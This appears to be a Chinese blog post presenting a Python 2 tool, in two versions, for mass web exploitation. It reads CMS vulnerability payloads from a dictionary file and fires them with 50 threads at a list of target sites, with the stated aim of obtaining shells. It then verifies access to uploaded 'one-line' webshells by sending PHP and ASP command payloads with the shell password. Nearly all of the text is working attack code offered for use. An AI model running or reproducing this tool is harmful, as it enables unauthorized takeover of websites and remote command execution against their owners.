目标:根据上一篇写的指纹录入工具,可以收集很多cms等漏洞指纹,然后运行改脚本直接获取shell,也可以作为路径扫描程序,同时含有一句话连接验证功能
#coding=utf-8
import requests
import Queue
import threading
import re
queue=Queue.Queue()
#===================================================#
#exp_info
#exp_info(0) 提交的方式
#exp_info(1) 测试路径
#exp_info(3) POST 提交的数据 GET 为空
#exp_info(4) 关键字
#exp_info(5) shell的路径
#exp_info(5) shell的密码
#====================================================#
def init():
f=open("exp.dic")
for line in f.readlines():
exp_info=line.strip().split('|')
queue.put(exp_info)
f.close()
def openUrl(url,GET_POST,pdata):
try:
if GET_POST=="POST":
#分解post数据
s = ",".join(pdata.split("&"))
pdata = dict((l.split('=') for l in s.split(',')))
r = requests.post(url, timeout=20, allow_redirects=False, data=pdata)
else :
r = requests.get(url, timeout=20, allow_redirects=False)
content=r.content
r.close()
if r.status_code in [200,500]:
return (r.status_code ,r.encoding,content)
return (0,0,False)
except:
return (0,0,False)
def checkKeyWord(page,page_encoding,keyword):
try:
page = unicode(page, page_encoding)
except:
return False
pattern =re.compile(keyword)
if pattern.findall(page)!=[]:
return True
else:
return False
def checkConnectionSuccess(shell_url,pdata):
status_code, encoding, content = openUrl(shell_url, "POST", pdata)
#print status_code,content
if content == "test":
print " the connection is successful "
else:
print "the connection is fail"
def checkGetShellSuccess(shell_url,shell_pwd):
script_type=shell_url.split(".")[-1]
#print script_type
if script_type=='php':
pdata=shell_pwd+'=echo "test";'
return checkConnectionSuccess(shell_url,pdata)
elif script_type=='asp':
pdata=shell_pwd+'=execute("response.clear:response.write(""test""):response.end")'
return checkConnectionSuccess(shell_url,pdata)
else:
pdata=shell_pwd+'=Response.Clear();Response.Write("test");'
return checkConnectionSuccess(shell_url,pdata)
def output(content,status_code,page_encoding,test_url,re_keyword,shell_url,shell_pwd):
if content is not False:
if content is None:
print '[-]status[%s]---%s |no foud data' % (status_code, test_url)
else:
if re_keyword is None:
if shell_url is None:
print '[+]status[%s]---shell url: %s | password: %s' % (status_code, test_url)
else:
print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
else:
if checkKeyWord(content, page_encoding, re_keyword) is True:
if shell_url is None:
print '[+]status[%s]---shell url: %s | password: %s' % (status_code, test_url)
else:
print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
#检测是不是可以连接一句话
checkGetShellSuccess(shell_url, shell_pwd)
else:
print '[-]status[%s]---%s is possible' % (status_code, test_url)
def scan(url):
while not queue.empty():
exp_info=queue.get(True)
GET_POST=exp_info[0]
test_url=url+exp_info[1]
pdata=exp_info[2]
re_keyword=exp_info[3]
shell_url=url+exp_info[4]
shell_pwd=exp_info[5]
#print "scanning "+url
status_code,page_encoding,content=openUrl(test_url,GET_POST,pdata)
output(content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd)
queue.task_done()
if __name__=="__main__":
threadNum = 50 #线程数量
f=open("2.txt") #2.txt添加你要测试的网站
for url in f.readlines():
init()
url="http://"+url.strip()
print "scanning "+url
for i in range(threadNum):
t = threading.Thread(target=scan,args={url,})
t.start()
queue.join()
f.close()
raw_input('press enter key to exit') #这儿放一个等待输入是为了不让程序退出
利用pyinstaller 打包成exe,运行结果如下:
最新加入了一句话验证功能
优化版本
a)添加配置文件
b)文件不存在捕获提示
c)输出提示更完善
getshell.py
#coding=utf-8
import requests
import Queue
import threading
import re
import ConfigParser
queue=Queue.Queue()
#===================================================#
#exp_info
#exp_info(0) 提交的方式
#exp_info(1) 测试路径
#exp_info(3) POST 提交的数据 GET 为空
#exp_info(4) 关键字
#exp_info(5) shell的路径
#exp_info(5) shell的密码
#====================================================#
def init(filename):
try:
f=open(filename)
for line in f.readlines():
exp_info = line.strip().split('|')
queue.put(exp_info)
f.close()
except:
return False
def openUrl(url,GET_POST,pdata):
try:
if GET_POST=="POST":
#分解post数据
s = ",".join(pdata.split("&"))
pdata = dict((l.split('=') for l in s.split(',')))
r = requests.post(url, timeout=20, allow_redirects=False, data=pdata)
else :
r = requests.get(url, timeout=20, allow_redirects=False)
content=r.content
r.close()
if r.status_code in [200,500]:
return (r.status_code ,r.encoding,content)
return (0,0,False)
except:
return (0,0,False)
def checkKeyWord(page,page_encoding,keyword):
try:
page = unicode(page, page_encoding)
except:
return False
pattern =re.compile(keyword)
if pattern.findall(page)!=[]:
return True
else:
return False
def checkConnectionSuccess(shell_url,pdata):
status_code, encoding, content = openUrl(shell_url, "POST", pdata)
#print status_code,content
if content == "test":
print " the connection is successful "
else:
print "the connection is fail"
def checkGetShellSuccess(shell_url,shell_pwd):
script_type=shell_url.split(".")[-1]
#print script_type
if script_type=='php':
pdata=shell_pwd+'=echo "test";'
checkConnectionSuccess(shell_url,pdata)
else:
pdata=shell_pwd+'=execute("response.clear:response.write(""test""):response.end")'
checkConnectionSuccess(shell_url,pdata)
def output(url,content,status_code,page_encoding,test_url,re_keyword,shell_url,shell_pwd):
if content is not False:
if content is None:
print '[-]status[%s]---%s |no foud data' % (status_code, test_url)
else:
if re_keyword is None:
if shell_url ==url:
print '[+]status[%s]---shell url: %s ' % (status_code, test_url)
else:
print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
else:
if checkKeyWord(content, page_encoding, re_keyword) is True:
if shell_url ==url:
print '[+]status[%s]---shell url: %s ' % (status_code, test_url)
else:
print test_url
print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
#检测是不是可以连接一句话
checkGetShellSuccess(shell_url, shell_pwd)
else:
print '[-]status[%s]---%s is possible' % (status_code, test_url)
def scan(url):
while not queue.empty():
exp_info=queue.get(True)
GET_POST=exp_info[0]
test_url=url+exp_info[1]
pdata=exp_info[2]
re_keyword=exp_info[3]
shell_url=url+exp_info[4]
shell_pwd=exp_info[5]
#print "scanning "+url
status_code,page_encoding,content=openUrl(test_url,GET_POST,pdata)
output(url,content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd)
queue.task_done()
def configRead():
config = ConfigParser.ConfigParser()
config.readfp(open('config.ini'))
test_url_file_path = config.get("file_path", "test_url_file_path")
exp_file_path = config.get("file_path", "exp_file_path")
return test_url_file_path,exp_file_path
if __name__=="__main__":
test_url_file_path, exp_file_path = configRead()
threadNum = 50
try:
f=open(test_url_file_path)
for url in f.readlines():
if(init(exp_file_path) is False):
print "exp file not found"
break
url="http://"+url.strip()
print "scanning "+url
for i in range(threadNum):
t = threading.Thread(target=scan,args={url,})
t.start()
queue.join()
f.close()
except:
print "test web url file not found"
raw_input('press enter key to exit') #这儿放一个等待输入是为了不让程序退出
配置文件
config.ini
[file_path]
;网站测试文件路径
test_url_file_path=2.txt
;exp文件路径
exp_file_path=exp.dic